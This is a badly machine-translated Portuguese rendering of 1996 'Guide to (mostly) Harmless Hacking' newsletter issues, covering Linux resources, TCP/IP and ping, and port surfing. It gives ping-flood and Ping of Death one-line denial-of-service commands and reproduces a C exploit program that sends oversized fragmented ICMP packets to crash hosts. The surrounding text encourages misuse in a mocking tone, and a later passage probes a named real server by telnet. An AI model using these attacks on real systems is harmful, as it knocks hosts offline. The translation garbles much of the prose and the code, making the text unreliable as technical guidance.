O melhor que eu encontrei é http://sunsite.unc.edu:/pub/Linux/. Inclui a lista freqüentemente pedida das perguntas do linux (FAQ), disponível de 
sunsite.unc.edu:/pub/Linux/docs/FAQ.
No diretório /pub/Linux/docs em sunsite.unc.edu você encontrará um número outros de originais sobre o linux, including o linux INFO-SHEET e META-FAQ, 
O arquivo do linux HOWTO está no Web site de sunsite.unc.edu em: /pub/Linux/docs/HOWTO. O diretório /pub/Linux/docs/LDP contem o jogo actual de manuais de LDP. 
Você pode começ do “a instalação linux e a obtenção começado” de sunsite.unc.edu em /pub/Linux/docs/LDP/install-guide. A lima de README lá descreve como você pode requisitar uma cópia impressa do livro do mesmo nome (aproximadamente 180 páginas). 
Agora se você não se ocupa começ inflamado, você pode querer afixar perguntas ao número surpreendente de grupos da notícia de USENET que cobrem o linux. Estes incluem: 
benefícios de comp.os.linux.advocacy do linux comparados 
sementes do linux de comp.os.linux.development.system, excitadores de dispositivo 
usuários do sistema da janela do linux X de comp.os.linux.x 
aplicações do linux da escrita de comp.os.linux.development.apps 
compatibilidade da ferragem de comp.os.linux.hardware 
a instalação do linux de comp.os.linux.setup 
comp.os.linux.net que trabalha trabalhos em rede e comunicações 
FAQ de comp.os.linux.answers, Como-A, READMEs, etc. 
linux.redhat.misc 
uso comp.os.linux.* de alt.os.linux preferivelmente 
ajudas da universidade do USENET de alt.uu.com p.os.linux.questions você 
anúncios de comp.os.linux.announce importantes para o linux 
tópicos Linux-específicos de comp.os.linux.misc 
Querer seu linux livre? Tobin Fricke indic que “as cópias livres dos CD-ROMs do linux estão disponíveis a sustentação do linux & o Web site CD de Givaway em http://emile.math.ucsb.edu:8000/giveaway.html. Este é um projecto onde os povos doem o CD do linux que não precisam mais. O projecto foi semeado pelos laboratórios de Linux Sistema, que doaram 800 Cd do linux inicialmente! Recordar por favor doar seu CD do linux quando você é feito com eles. Se você vive perto de uma reunião de troca do computador, da fritada, do Microcenter, ou do outro tal lugar, procurar o CD do linux lá. Estão geralmente sob $20, que é um investimento excelente. Eu gosto pessoal do recurso do colaborador do linux por Infomagic, que é agora até um jogo do CD sete, mim acredito, que inclui todas as distribuições principais do linux (Slackware, Redhat, Debian, linux para que o alfa do DEC nomeie alguns) mais espelhos de tsx11.mit.edu e de sunsite.unc.edu/pub/linux mais muito mais. Você deve igualmente visitar a página MARAVILHOSA do linux em 
http://sunsite.unc.edu/linux, que tem toneladas de informação, assim como 
http://www.linux.org/. Você pôde igualmente querer verific para fora 
http://www.redhat.com/ e http://www.caldera.com/ para mais 
informação nas versões comerciais do linux (que são ainda livremente GNU inferior disponível).“ 
Como sobre a segurança do linux? Sim, o linux, como cada sistema de exploração, é imperfeito. Eminente hackable, se você quer realmente saber. Assim se você quer encontrar como fixar seu sistema do linux, ou se você vier através de um de muitos ISPs que usam o linux e o querem ir explorar (os oops, esquecem I
escreveu que), é aqui onde você pode ir para a informação: 
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks 
ftp://info.cert.org/pub/tech_tips/root_compromise 
http://bach.cis.temple.edu/linux/linux-security/ 
http://www.geek-girl.com/bugtraq/ 
Há igualmente uma ajuda para usuários do linux no Internet Relay Chat. Ben (cyberkid@usa.net) 
hospeda uma canaleta chamada #LinuxHelp no usuário do IRC de Undernet. 
Último mas não de menor importância, se você quer fazer perguntas do linux na lista feliz do cabouqueiro, você é bem-vindo. Nós podemos ser os cegos conduzindo as cortinas, mas que 
os pedaços! 
______________________________________ 
Direitos reservados Carolyn 1996 P. Meinel. Você pode enviar o GUIA (na maior parte) AO CORTE INOFENSIVO contanto que você deixar esta observação na extremidade. 
______________________________________ 
__________________________________________________________ 
GUIA (na maior parte) AO CORTE INOFENSIVO 
Vol. 2 número 3 
Introdução ao TCP/IP. Isso significa pacotes! Datagramas! Sibilar a negação de tamanho grande do pacote da façanha do serviço explicada. Mas este corte é muito menos na maior parte inofensivo do que a maioria. Não tentar isto em casa… 
__________________________________________________________ 
Se você estêve na lista feliz do cabouqueiro para por algum tempo, você tem começ alguns artigos enviados da lista de Bugtraq em uma façanha nova do pacote do sibilo. 
Agora se isto tem soado como o jargão a você, relaxar. É realmente muito simples. De facto, é tão simples que se você usa Windows 95, antes que você termina este artigo você saberá um simples, a um-linha comando que você poderia usar para deixar de funcionar muitos anfitriões e routeres do Internet. 
************************************************* 
VOCÊ PODE IR ENCARCERAR O AVISO: Esta vez eu não estou indo implorar os tipos maus do gênio do presunçoso nesta lista para ser virtuoso e resistir a tentação empregar mal a informação que eu estou a ponto dos dar. Ver se eu me importo! Se um daqueles indivíduos começ milhares deixando de funcionar travados de anfitriões e de routeres do Internet, não somente irã0 encarcerar e começ uma multa grande. Nós todos pensá-lo-emos ou é um dork. Esta façanha é um básico, um-linha comando de Windows 95. Yeah, o sistema de exploração que é projectado para parvos à nora. Tão não há nada elite sobre este corte. O que é a elite está podendo thwart este ataque. 
************************************************** 
************************************************** 
NOTA DO NEWBIE: Se os pacotes, as datagramas, e o TCP/IP não são exactamente seus camaradas de peito ainda, acreditar-me, você precisam de
conseguir realmente na cama com eles a fim chamar-se um cabouqueiro. Pendurar assim dentro aqui para algum material técnico. Quando 
nós somos feitos, você terá a satisfação de conhecê-lo poderia wreak o havoc no Internet, mas é demasiado elite a fazer assim. 
Um pacote é uma maneira de emitir electronicamente a informação que mantem para fora erros. A idéia é que nenhuma tecnologia de transmissão é perfeita. Você jogou nunca o jogo “telefone”? Você começ dúzia ou assim que um pessoa em um círculo e na primeira pessoa sussurra uma mensagem ao segundo. Algo como “o bolo é o mais baixo formulário do trigo.” A segunda pessoa sussurra ao terço, “um vagabundo é o mais baixo formulário do engano.” O terço sussurra, “rum é o mais baixo formulário de 
beber.“E assim por diante. É realmente divertimento para encontrar como distante a mensagem pode se transformar enquanto circunda o círculo. 
Mas quando, por exemplo, você começ o email, você preferiria que não está sujado acima. Assim o computador que emite o email quebra-o acima nas partes pequenas chamadas datagramas. Então envolve as coisas em torno de cada datagrama que dizem que 
computador que precisa de ir a, de onde veio, e essa verificação se a datagrama pôde ter sido truncada. Estes envolvidos acima dos pacotes da datagrama são chamados “pacotes.” 
Agora se o computador que emite o email a você era empacotar uma mensagem realmente longa em apenas um pacote, as possibilidades são consideravelmente elevadas que começ sujado acima quando em sua maneira ao outro computador. Burps do bocado. Assim quando o computador de recepção verific o pacote e encontrar que começ sujado acima, ele 
jogá-lo-á afastado e di-lo-á o outro computador para emiti-lo outra vez. Poderia tomar um tempo longo até que este pacote gigante começ com intact. 
Mas se a mensagem se quebra em muitas partes pequenas e se é envolvida acima em grupos dos pacotes, a maioria deles serão bons e o computador de recepção mantê-los-á. Dirá então o computador de emissão para retransmitir apenas os pacotes que sujaram acima. Então quando todas as partes começ finalmente lá, o computador de recepção une-os na ordem e no lo direitos e behold, lá é-o o email completo, sem erros. 
O TCP/IP representa o Transmission Control Protocol/Internet Protocol. Diz os computadores que são enganchados até o Internet como empacotar acima das mensagens em pacotes e como ler pacotes estes pacotes de outros computadores. O sibilo usa o TCP/IP para fazer seus pacotes. 
********************************************** 
O “sibilo” é um comando que emita um calibre de lâminas para fora de seu computador a um outro computador para considerar se é girado sobre e enganchado à mesma rede que você é sobre. No Internet há uns dez milhão computadores que você pode sibilar. 
O sibilo é um comando que você pode dar, por exemplo, sistemas de exploração de Unix, de Windows 95 e de Windows NT. É parte do Internet Control Message Protocol, que é usado para pesquisar defeitos redes do TCP/IP. O que faz é diz um computador remoto para ecoar para trás um sibilo. Assim se você começ seu sibilo
suportar, você sabem que o computador está vivo. Além disso, alguns formulários do comando de sibilo igualmente dir-lhe-ão quanto tempo toma para que uma mensagem saia a esse computador e volte outra vez. 
Mas como seu computador sabe que o sibilo que apenas mandou ecoado realmente para trás do computador alvejado? A datagrama é a resposta. O sibilo mandou uma datagrama. Se o sibilo de retorno prende esta mesma datagrama, você sabe que era seu sibilo que apenas ecoou para trás. 
O formato básico deste comando é simplesmente: 
hostname do sibilo 
onde o “hostname” é o internet address do computador você quer verific para fora. 
Quando eu dou este comando da liberação 4.1 Unix de Sun, eu começ a resposta “hostname estou vivo.” 
************************************** 
TIP TÉCNICO: Por causa dos poderes destrutivos do sibilo, muitos provedores de serviços do Internet escondem o programa do sibilo em seus clientes de escudo onde os newbies à nora não podem começ suas mãos nele. Se seu cliente de escudo diz o “comando não encontrado” quando você incorpora o comando de sibilo, tentar: 
hostname de /usr/etc/ping 
Se isto não trabalha, ou tentar o comando “whereis sibilam” ou queixar-se à sustentação de tecnologia do seu ISP. Podem ddiabled o sibilo para usuários ordinários, mas se você convence a sustentação de tecnologia você são um bom cidadão que do Internet podem o deixar a usar. 
*************************************** 
**************************************** 
NOTA DO NEWBIE: Você diz que você não pode encontrar uma maneira de sibilar de seu serviço online? Isso pode ser porque você não tem um cliente de escudo. Mas há uma coisa que você precisa realmente a fim cortar: UM CLIENTE DE SHELL!!!! 
Os cabouqueiros da razão fazem o divertimento dos povos com clientes de America Online são porque esse ISP não dá para fora clientes de escudo. Isto é porque America Online o quer ser bons meninos e meninas e não corte! 
De “um cliente escudo” é um cliente do Internet em que seu computador se transforma um terminal de um de computadores de anfitrião do seu ISP. Uma vez que você está no “escudo” você pode dar comandos ao sistema de exploração (que é geralmente Unix) apenas 
como você estavam sentando-se lá no console de um de anfitriões do seu ISP. 
Você pode já ter um cliente de escudo mas apenas não saber entrar-lhe. Chamar a sustentação de tecnologia com seu ISP para encontrar se você tem um, e como começ nele. 
*************************************** 
Há todas as sortes de variações extravagantes no comando de sibilo. E, suposição o que, sempre que há um comando que você entreg o Internet que tem lotes das variações, você pode apenas sobre a contagem lá em ser algo hackable dentro lá. Muhahaha! 
O sibilo da inundação é um exemplo simples. Se seu sistema de exploração o deixará começ afastado com doação do comando:
- > sibilo - hostname de f 
manda uma inundação verídico dos sibilos, tão rapidamente como o computador central do seu ISP pode os fazer. Isto mantem o anfitrião que você alvejou a parte traseira de eco tão ocupada seus sibilos que pode fazer pouco mais. Igualmente põr uma carga pesada sobre a rede. 
Os cabouqueiros com nível de habilidade primitivos às vezes reunirão e usarão diversos de seus computadores imediatamente para sibilar simultaneamente o computador de anfitrião do Internet de alguma vítima. Isto manterá geralmente o computador da vítima demasiado 
ocupado para fazer qualquer outra coisa. Pode mesmo deixar de funcionar. Entretanto, o para baixo lateral (do ponto de vista dos atacantes) é que mantem os computadores dos atacantes amarrados acima, demasiado. 
************************************** 
NOTA DO NETIQUETTE: A inundação que sibila um computador é extremamente rude. Começ travado fazendo isto e você será afortunado se o mais mau que acontece é seu serviço online que o fornecedor fecha seu cliente. Fazer isto a um cabouqueiro sério e você pode precisar uma transplantação da identidade. 
Se você começar um tipo do sibilo da inundação de acidentalmente, você pode fechá-lo fora mantendo a chave de controle e pressionando “c” (Controlo-C). 
************************************** 
************************************* 
TIP MAU DO GÊNIO: Sibilo você mesmo! Se você está usando alguma sorte de Unix, seu sistema de exploração deixá-lo-á usar seu computador para fazer apenas sobre qualquer coisa a se que pode fazer a outros computadores. O endereço de rede que o toma 
de volta a seu próprio computador de anfitrião são o localhost (ou 127.0.0.1). Está aqui um exemplo de como eu uso o localhost: 
localhost do >telnet do <slug> [65] - 
127.0.0.1 de tentativa… 
Conectado ao localhost. 
O carácter de escape é “^]”. 
SunOS UNIX 
início de uma sessão: 
Ver, mim são de volta à seqüência do início de uma sessão para o computador nomeado “slug” toda sobre 
outra vez. 
Agora eu sibilo-me: 
localhost do <llama> [68] - >/usr/etc/ping 
o localhost está vivo 
Isto dá o mesmo resultado como se eu devia comandar: 
lama do <llama> [69] - >/usr/etc/ping 
llama.swcp.com está vivo 
**************************************** 
*****************************************
TIP DE MUHAHAHA: Querer arrancar alguém chain? Dizer-lhe ao ftp a 127.0.0.1 e ao início de uma sessão using seus próprios nome e senha de usuário para o warez do kewl! Meu ex-husband Keith Henson fêz aquele à igreja de Scientology. O ftp-ed das rodas denteadas a 127.0.0.1 e descoberto todas suas escrituras com direitos de autor. Elas 
sups que isto estava no computador de Keith, não dele. Eram *so* sure que teve suas escrituras que lhe tomaram à corte. O juiz, quando realizou que estavam dando laços simplesmente - para trás a seu próprio computador, riu-os literalmente fora da corte. 
Para um transcrito ou uma cassete áudio divertida desta sessão do tribunal infame, email hkhenson@cup.portal.com. Aquele é email address de Keith. Meu chapéu está a um cabouqueiro magnífico! 
******************************************* 
Entretanto, a façanha que de tamanho grande do pacote do sibilo você está a ponto de aprender fará ainda mais dano a alguns anfitriões do que um grupo de conspiradores do sibilo da inundação. E fá-la-á sem amarrar acima do computador dos atacantes para mais por muito tempo do que o segundo onde rachado toma para mandar apenas um sibilo. 
A maneira a mais fácil de fazer este corte é funcionar Windows 95. Não a têm? Você pode geralmente encontrar uma loja do EL Cheapo que lhea venda para $99. 
Para fazer isto, primeira instalação seu sistema de Windows 95 de modo que você possa fazer uma conexão do PPP ou do SLIP com o Internet using o programa marcação telefónica dos trabalhos em rede sob meu ícone do computador. Você pode precisar alguma ajuda de sua sustentação de tecnologia do ISP em configurar isto. Você deve fazê-la esta maneira ou este corte não trabalhará. Seu *definitely* do dialer de America Online não trabalhará. 
************************************ 
NOTA DO NEWBIE: Se sua conexão a internet permite que você funcione um web browser que mostre retratos, você pode usar esse número marcação telefónica com seu programa marcação telefónica dos trabalhos em rede de Windows 95 para começ uma conexão do PPP ou do SLIP. 
************************************ 
Em seguida, começ o seu conectado ao Internet. Mas não funcionar um navegador ou qualquer coisa. Em lugar de, uma vez que seu programa marcação telefónica dos trabalhos em rede lhe diz que você tem uma conexão, estalar sobre a tecla do “começo” e ir à lista “MS-DOS.” Abrir esta janela do DOS. Você começ um alerta: 
C:windows > 
Deixar-nos agora primeiramente fazer isto a boa maneira do cidadão. Neste alerta você pode dactilografar dentro um comando ordinário liso do “sibilo”: 
hostname de C:windowsping 
onde o “hostname” é o endereço de algum computador do Internet. Por exemplo, você poderia sibilar thales.nmia.com, que é um de meus computadores favoritos, nomeado após um filósofo grego obscuro. 
Agora se você aconteceu saber o endereço de um de computadores de Saddam Hussein, entretanto, você pôde querer dar o comando: 
c:windowsping - l 65510 saddam_hussein's.computer.mil
Agora não fazer realmente isto a um computador real! Alguns, mas não todos, computadores deixarão de funcionar e para permanecer pendurados ou recarregar quando começ este sibilo. Outro continuarão a trabalhar cheerily longitudinalmente, e então vão de repente sob horas mais tarde. 
Por que? Esse extra adicionado - l 65510 cria uma datagrama gigante para o pacote do sibilo. Alguns computadores, quando pedidos para emitir para trás uma datagrama idêntica, começ sujados realmente acima. 
Se você quer todos os detalhes cruentos nesta façanha do sibilo, incluindo como proteger para fora seus computadores dela, verificação 
http://www.sophist.demon.co.uk/ping. 
Agora há outras maneiras de manufacturar uma datagrama gigante do sibilo além de usar Windows 95. Por exemplo, se você funciona determinadas versões de FreeBSD ou de linux de Unix em seu PC, você pode funcionar este programa, que foi afixado à lista de Bugtraq. 
De: Bill Fenner <fenner@freefall.freebsd.org> 
: Receptores múltiplos da lista BUGTRAQ <BUGTRAQ@netspace.org> 
Assunto: Programa da façanha do sibilo 
Desde que alguns povos não têm necessariamente Windows '95 caixas se encontrar ao redor, I (Fenner) escreveu o seguinte programa da façanha. Exige uma camada crua do soquete que não suje com o pacote, assim que o DEB 4.3, SunOS e os solaris são 
para fora. Trabalha muito bem nos sistemas 4.4BSD. Deve trabalhar no linux se você compila com - DREALLY_RAW. 
Sentir livre fazer com este o que você quer. Usar por favor esta ferramenta para testar somente suas próprias máquinas, e para não deixar de funcionar outro. 
* win95ping.c 
* 
* Simular o mal win95 “sibilo - l 65510 buggyhost”. 
* versão 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996 
* 
* Isto exige os soquetes crus que não sujam com o pacote de todo (outro 
* do que adicionando a soma de controle). Isso significa esse SunOS, solaris, e 
* Os sistemas de BSD4.3-based estão para fora. Sistemas BSD4.4 (FreeBSD, NetBSD, 
* OpenBSD, BSDI) trabalhará. O linux pôde trabalhar, mim não tem um linux 
* sistema para tentá-lo sobre. 
* 
* O ataque da caixa Win95 olha o gosto: 
* 17:26:11.013622 cslwin95 > arkroyal: ICMP: pedido do eco (6144:1480 @0+ do frag) 
* 17:26:11.015079 cslwin95 > arkroyal: (6144:1480 @1480+ do frag) 
* 17:26:11.016637 cslwin95 > arkroyal: (6144:1480 @2960+ do frag) 
* 17:26:11.017577 cslwin95 > arkroyal: (6144:1480 @4440+ do frag) 
* 17:26:11.018833 cslwin95 > arkroyal: (6144:1480 @5920+ do frag) 
* 17:26:11.020112 cslwin95 > arkroyal: (6144:1480 @7400+ do frag)
* 17:26:11.021346 cslwin95 > arkroyal: (6144:1480 @8880+ do frag 
* 17:26:11.022641 cslwin95 > arkroyal: (6144:1480 @10360+ do frag) 
* 17:26:11.023869 cslwin95 > arkroyal: (6144:1480 @11840+ do frag) 
* 17:26:11.025140 cslwin95 > arkroyal: (6144:1480 @13320+ do frag) 
* 17:26:11.026604 cslwin95 > arkroyal: (6144:1480 @14800+ do frag) 
* 17:26:11.027628 cslwin95 > arkroyal: (6144:1480 @16280+ do frag) 
* 17:26:11.028871 cslwin95 > arkroyal: (6144:1480 @17760+ do frag) 
* 17:26:11.030100 cslwin95 > arkroyal: (6144:1480 @19240+ do frag) 
* 17:26:11.031307 cslwin95 > arkroyal: (6144:1480 @20720+ do frag) 
* 17:26:11.032542 cslwin95 > arkroyal: (6144:1480 @22200+ do frag) 
* 17:26:11.033774 cslwin95 > arkroyal: (6144:1480 @23680+ do frag) 
* 17:26:11.035018 cslwin95 > arkroyal: (6144:1480 @25160+ do frag) 
* 17:26:11.036576 cslwin95 > arkroyal: (6144:1480 @26640+ do frag) 
* 17:26:11.037464 cslwin95 > arkroyal: (6144:1480 @28120+ do frag) 
* 17:26:11.038696 cslwin95 > arkroyal: (6144:1480 @29600+ do frag) 
* 17:26:11.039966 cslwin95 > arkroyal: (6144:1480 @31080+ do frag) 
* 17:26:11.041218 cslwin95 > arkroyal: (6144:1480 @32560+ do frag) 
* 17:26:11.042579 cslwin95 > arkroyal: (6144:1480 @34040+ do frag) 
* 17:26:11.043807 cslwin95 > arkroyal: (6144:1480 @35520+ do frag) 
* 17:26:11.046276 cslwin95 > arkroyal: (6144:1480 @37000+ do frag) 
* 17:26:11.047236 cslwin95 > arkroyal: (6144:1480 @38480+ do frag) 
* 17:26:11.048478 cslwin95 > arkroyal: (6144:1480 @39960+ do frag) 
* 17:26:11.049698 cslwin95 > arkroyal: (6144:1480 @41440+ do frag) 
* 17:26:11.050929 cslwin95 > arkroyal: (6144:1480 @42920+ do frag) 
* 17:26:11.052164 cslwin95 > arkroyal: (6144:1480 @44400+ do frag) 
* 17:26:11.053398 cslwin95 > arkroyal: (6144:1480 @45880+ do frag) 
* 17:26:11.054685 cslwin95 > arkroyal: (6144:1480 @47360+ do frag) 
* 17:26:11.056347 cslwin95 > arkroyal: (6144:1480 @48840+ do frag) 
* 17:26:11.057313 cslwin95 > arkroyal: (6144:1480 @50320+ do frag) 
* 17:26:11.058357 cslwin95 > arkroyal: (6144:1480 @51800+ do frag) 
* 17:26:11.059588 cslwin95 > arkroyal: (6144:1480 @53280+ do frag) 
* 17:26:11.060787 cslwin95 > arkroyal: (6144:1480 @54760+ do frag) 
* 17:26:11.062023 cslwin95 > arkroyal: (6144:1480 @56240+ do frag) 
* 17:26:11.063247 cslwin95 > arkroyal: (6144:1480 @57720+ do frag) 
* 17:26:11.064479 cslwin95 > arkroyal: (6144:1480 @59200+ do frag) 
* 17:26:11.066252 cslwin95 > arkroyal: (6144:1480 @60680+ do frag) 
* 17:26:11.066957 cslwin95 > arkroyal: (6144:1480 @62160+ do frag) 
* 17:26:11.068220 cslwin95 > arkroyal: (6144:1480 @63640+ do frag) 
* 17:26:11.069107 cslwin95 > arkroyal: (6144:398 @65120 do frag) 
* 
* 
#include <stdio.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netdb.h> 
#include <netinet/in.h>
#include <netinet/in_systm.h> 
#include <netinet/ip.h> 
#include <netinet/ip_icmp.h> 
/* 
* Se sua semente não muck com pacotes crus, o #define REALLY_RAW. 
* Este é provavelmente somente linux. 
* 
#ifdef REALLY_RAW 
REPARO do #define (x) htons (x) 
#else 
REPARO do #define (x) (x) 
#endif 
int 
cano principal (argc do int, carvão animal ** argv) 
{ 
int s; 
buf do carvão animal [1500]; 
*ip do IP do struct = (IP do struct *) buf; 
*icmp do ICMP do struct = (ICMP do struct *) (IP + 1); 
*hp hostent do struct; 
dst do sockaddr_in do struct; 
offset do int; 
int = em 1; 
bzero (buf, buf do sizeof); 
se ((s = soquete (AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) { 
perror (“soquete”); 
saída (1); 
} 
se (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (sobre)) < 0) { 
perror (“IP_HDRINCL”); 
saída (1); 
} 
se (argc!= 2) { 
fprintf (stderr, “uso: hostname de %s  n”, argv [0]); 
saída (1); 
} 
se ((cavalos-força = gethostbyname (argv [1])) ZERO do ==) { 
se ((ip->ip_dst.s_addr = inet_addr (argv [1])) == -1) { 
fprintf (stderr, “%s: anfitrião desconhecido  n”, argv [1]); 
} 
} mais { 
bcopy (hp->h_addr_list [0], &ip->ip_dst.s_addr, hp->h_length); 
} 
printf (“emitindo a %s  n”, inet_ntoa (ip->ip_dst));
ip->ip_v = 4; 
*ip do ip->ip_hl = do sizeof >> 2; 
ip->ip_tos = 0; 
ip->ip_len = REPARO (buf do sizeof); 
ip->ip_id = htons (4321); 
ip->ip_off = REPARO (0); 
ip->ip_ttl = 255; 
ip->ip_p = 1; 
ip->ip_sum = 0; a semente de/* preenche * 
ip->ip_src.s_addr = 0; a semente de/* preenche * 
dst.sin_addr = ip->ip_dst; 
dst.sin_family = AF_INET; 
icmp->icmp_type = ICMP_ECHO; 
icmp->icmp_code = 0; 
icmp->icmp_cksum = htons (~ (ICMP_ECHO << 8)); 
/* a soma de controle de todos os 0 é fácil de computar * 
para (deslocar = 0; offset < 65536; += offset (buf do sizeof - *ip do sizeof)) { 
ip->ip_off = REPARO (deslocar >> 3); 
se (deslocar < 65120) 
ip->ip_off |= REPARO (IP_MF); 
mais 
ip->ip_len = o REPARO (418); /* fazem o total 65538 * 
se (sendto (s, buf, buf do sizeof, 0, (sockaddr do struct *) &dst, 
dst) do sizeof < 0) { 
fprintf (o stderr, “deslocou %d: ”, offset); 
perror (“sendto”); 
} 
se (deslocar o == 0) { 
icmp->icmp_type = 0; 
icmp->icmp_code = 0; 
icmp->icmp_cksum = 0; 
} 
} 
} 
(Extremidade da mensagem da façanha do sibilo de Fenner.) 
******************************************** 
VOCÊ PODE IR ENCARCERAR A NOTA: Não é não somente este corte elite, se você está lendo este que você não sabe bastante para se manter da obtenção rebentado de fazer este corte do sibilo. De um lado, se você devia o fazer a um anfitrião do Internet em Iraque… 
******************************************** 
Naturalmente há muitas outras coisas que do kewl você pode fazer com sibilo. Se você tem um cliente de escudo, você pode encontrar lotes do stuph sobre o sibilo dando o comando: 
sibilo do homem
De facto, você pode começ lotes dos detalhes em todo o comando de Unix com o “homem.” 
Ter o divertimento com sibilo -- e ser bom! Mas recordar, mim não estão implorando os presunçosos maus do gênio ser bons. Ver se eu me importo quando você começ rebentado… 
_______________________________________________________ 
Para subscrever, o email hacker@techbroker.com com mensagem “subscreve o hh.” Para emitir-me o email confidencial (por favor, nenhuns exames das actividades ilegais) usar cmeinel@techbroker.com. Dirigir por favor flamas a 
colaborador/null@techbroker.com. Corte feliz! 
Direitos reservados Carolyn 1996 P. Meinel. Você pode enviar o GUIA (na maior parte) AO CORTE INOFENSIVO contanto que você deixar esta observação na extremidade. 
______________________________________________________ 
__________________________________________________________ 
GUIA (na maior parte) AO CORTE INOFENSIVO 
Vol. 2 número 4 
Mais introdução ao TCP/IP: surfar portuário! Demónios! Como começ em quase algum computador sem entrar e sem quebrar a lei. Imprimir seus amigos à nora e descobrir realmente o kewl, stuph legal, seguro. 
__________________________________________________________ 
Alguns dias há eu tive uma visita do amigo de senhora. É 42 e não possui um computador. Entretanto, está tomando uma classe em computadores pessoais em um Instituto de Ensino Superior. Quis saber o que todo este stuph de corte é sobre. Assim eu decidi introduzi-la para mover surfar. E quando fazendo o, nós tropeçamos através de algo kewl. 
Surfar portuário aproveita-se da estrutura do TCP/IP. Este é o protocolo (jogo de réguas) usado para que os computadores falem sobre o Internet. Um dos princípios básicos de Unix (o sistema de exploração o mais popular no Internet) é atribuir um “porto” a cada função que um computador pôde comandar outro para executar. Os exemplos comuns são emitir e para receber o email, ler newsgroup de USENET, telnet, limas de transferência, e Web pages da oferta. 
************************ 
Nota #1 do Newbie: Um porto do computador é um lugar em onde a informação vá ou fora dela. Em seu computador home, os exemplos dos portos são seu monitor, que emitem a informação para fora, seu teclado e o rato, que emitem a informação dentro, e seu modem, que emite a informação para fora e dentro. 
Mas um computador de anfitrião do Internet tal como callisto.unm.edu tem muito mais portos do que um computador home típico. Estes portos são identificados por números. Agora estes não são todos os portos físicos, como um teclado ou um porto RS232 de série (para seu modem). São portos virtuais (do software). 
Um “serviço” é um programa que funciona em um “porto.” Quando você telnet a um porto, esse programa for em serviço, apenas esperando sua entrada. Corte feliz! 
************************ 
Assim se você quer ler um Web page, seu navegador contacta o número portuário 80 e diz o computador que controla esse Web site o deixar dentro. E, sure bastante, você começ nesse computador do web server sem uma senha.
APROVAÇÃO, grande coisa. Isso é consideravelmente padrão para o Internet. Muitos -- a maioria -- os computadores no Internet deixá-lo-ão fazem algumas coisas com elas sem precisar uma senha, 
Entretanto, a essência do corte está fazendo as coisas que não são óbvias. Isso apenas não salta em você dos manuais. O one-way que você pode mover uma intensificação do funcionamento do usuário do computador do moinho é aprender como mover a ressaca. 
A essência do porto que surfa é seleccionar um computador de alvo e explorá-lo para considerar que portos estão abertos e o que você pode fazer com eles. 
Agora se você é um cabouqueiro preguiçoso você pode usar ferramentas enlatadas do cabouqueiro tais como Satan ou Netcat. Estes são programas que você pode funcionar do linux, FreeBSD ou solaris (todos os tipos de Unix) de seu PC. Fazem a varredura automaticamente de seus computadores de alvo. Dir-lhe-ão que portos estão no uso. Igualmente sondarão estes portos para a presença de demónios com sabem falhas de segurança, e dizem-lhe o que são. 
******************************** 
Nota do Newbie # 2: Um demónio não é alguma sorte do grinch ou o gremlin ou o indivíduo 666. É um programa que funcione no fundo em muitos (mas não todo o) portos do sistema de Unix. Espera-o para vir longitudinalmente e usá-lo. Se você encontra um demónio em um porto, é provavelmente hackable. Algumas ferramentas do cabouqueiro dir-lhe-ão o que as características hackable são dos demónios que detectam. 
******************************** 
Entretanto, há diversas razões surfar à mão portos em vez de automaticamente. 
Você aprenderá algo. Sondando manualmente o começ uma sensação do intestino para como o demónio que funciona nesse porto se comporta. É a diferença entre a observação de um filme x-rated e (corar). 
Você pode imprimir seus amigos. Se você funciona uma ferramenta enlatada do cabouqueiro como Satan seus amigos o olhará e o dirá, “grande coisa. Eu posso funcionar programas, demasiado.” Travarão imediatamente sobre ao segredo pequeno sujo do mundo do cabouqueiro. A maioria de façanhas de corte são apenas programas que running do lamerz pegararam de algum BBS ou ftp site. Mas se você incorpora a introdução por teclado dos comandos pela introdução por teclado vê-lo- ão usar seu cérebro. E você pode ajudá-los a jogar com demónios, também, e dá- lhes uma arremetida gigante. 
Verdadeiramente os cabouqueiros da elite surfam portos e jogo com demónios à mão porque é a única maneira de descobrir algo novo. Há somente alguns cem cabouqueiros -- no máximo -- quem descobrem o stuph novo. O funcionamento do descanso apenas enlatou façanhas repetidamente e sobre outra vez. Furar. Mas eu sou ensinando lhe como alcangar o pináculo do hackerdom. 
Deixar-me agora dizem-lhe o que meus amigo e eu envelhecidos médios descobrimos apenas a sujeira ao redor. Primeiramente, nós decidimos que nós não quisemos desperdiçar nosso tempo que suja com algum computador de anfitrião pequeno menor. Hey, deixar-nos vão por o máximo! 
Assim como você encontra um computador grande do kahuna no Internet? Nós começamos com um domínio que consistisse em um LAN dos PCes que funcionam
o linux que eu aconteci saber já aproximadamente, de que fosse usado pelo ISP do acesso de Internet de New mexico: nmia.com. 
***************************** 
Nota do Newbie # 3: Um domínio é um internet address. Você pode usá-lo para olhar acima quem funciona os computadores usados pelo domínio, e para olhar igualmente acima como esse domínio é conectado ao descanso do Internet. 
***************************** 
Para fazer assim isto que nós registramos primeiramente em meu cliente de escudo com Cyberport Southwest. Eu dei o comando: 
>whois nmia.com do <slug> [66] - 
Acesso de Internet de New mexico (NMIA-DOM) 
SE de 2201 Buena Vista 
Albuquerque, nanômetro 87106 
Domain Name: NMIA.COM 
Contacto administrativo, contacto técnico, contacto da zona: 
Orrell, Stan (SO11) SAO@NMIA.COM 
(505) 877-0617 
Último actualizado Record em 11-Mar-94. 
Gravar criado em 11-Mar-94. 
Usuários de domínio em ordem listada: 
NS.NMIA.COM 198.59.166.10 
GRANDE.NM.ORG 129.121.1.2 
Agora é uma boa aposta que grande.nm.org está serindo muitos outros anfitriões do Internet ao lado de nmia.com. É aqui como nós movemos a ressaca nossa maneira de encontrar isto: 
>telnet grande.nm.org 15 do <slug> [67] - 
129.121.1.2 de tentativa… 
Conectado a grande.nm.org. 
O carácter de escape é “^]”. 
Rev B do TGV MultiNet V3.5, VAX 4000-400, OpenVMS VAX V6.1 
Data de validade da autorização da licença do produto 
---------- ------- ------------- --------------- 
MULTINET sim A-137-1641 (nenhuns) 
NFS-CLIENT sim A-137-113237 (nenhuns) 
Configuração do *** para a lima “MULTINET:*** de NETWORK_DEVICES.CONFIGURATION” 
Bandeiras do endereço do CSR do adaptador de dispositivo/vector 
------ ------- ----------- ------------ 
se0 (VMS compartilhado Ethernet/FDDI) - NENHUNS - NENHUNS - NENHUNS 
